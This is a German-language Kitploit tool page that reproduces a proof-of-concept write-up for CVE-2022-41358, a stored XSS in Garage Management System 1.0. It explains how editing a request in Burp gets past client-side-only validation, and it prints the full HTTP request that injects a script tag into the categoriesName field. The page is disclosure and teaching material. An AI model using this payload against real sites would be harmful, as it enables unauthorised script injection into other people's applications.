Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-41358 — Proof-of-concept-Exploit für CVE-2022-41358, der gespeichertes XSS in Garage Management System 1.0 über Burp Suite-Anfragenmanipulation demonstriert, um die clientseitige Validierung zu umgehen. | Kitploit
Tools/GitHubGitHub/thecasual/cve-2022-41358
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubthecasual/cve-2022-41358

CVE-2022-41358

Proof-of-concept-Exploit für CVE-2022-41358, der gespeichertes XSS in Garage Management System 1.0 über Burp Suite-Anfragenmanipulation demonstriert, um die clientseitige Validierung zu umgehen.

Repository anzeigen
2vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit-Titel: Garage Management System 1.0 - 'categoriesName' - Stored XSS

Exploit-Autor: Sam Wallace

Software-Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

Version: 1.0

Getestet auf: Debian

ID: CVE-2022-41358

 

Zusammenfassung:

Das Garage Management System nutzt clientseitige Validierung, um XSS zu verhindern. Mit Burp kann eine Anfrage modifiziert und erneut an den Server gesendet werden, um diese Validierung zu umgehen, was einen Weg für XSS schafft.

 

Wenn Meldungen darauf hindeuten, dass eine Validierung stattfindet, ist dies ein guter Zeitpunkt, um zu überprüfen, ob diese Prüfungen auch serverseitig durchgeführt werden.

Alternativtext

 

Dies ist die Anfrage vor jeglichen Änderungen in Burp.

Alternativtext

 

Führen Sie eine schnelle Änderung in Burp durch...

Alternativtext

 

Profit!

Alternativtext

 

Beweis

Alternativtext

POC

root@kitploit:~
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
root@kitploit:~
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close

------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"

<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"

1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"


------WebKitFormBoundaryqKDsN4gmatTEEkhS--


![Alternativtext](https://assets.kitploit.com/production/public/readmes/33421/62c2bf87d935c7a05de7ab8f4aaa6d890f63aa3462e00f52cf81f9a74892a9a7.png "Optionaler Titel")

Referenz:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

Tool herunterladen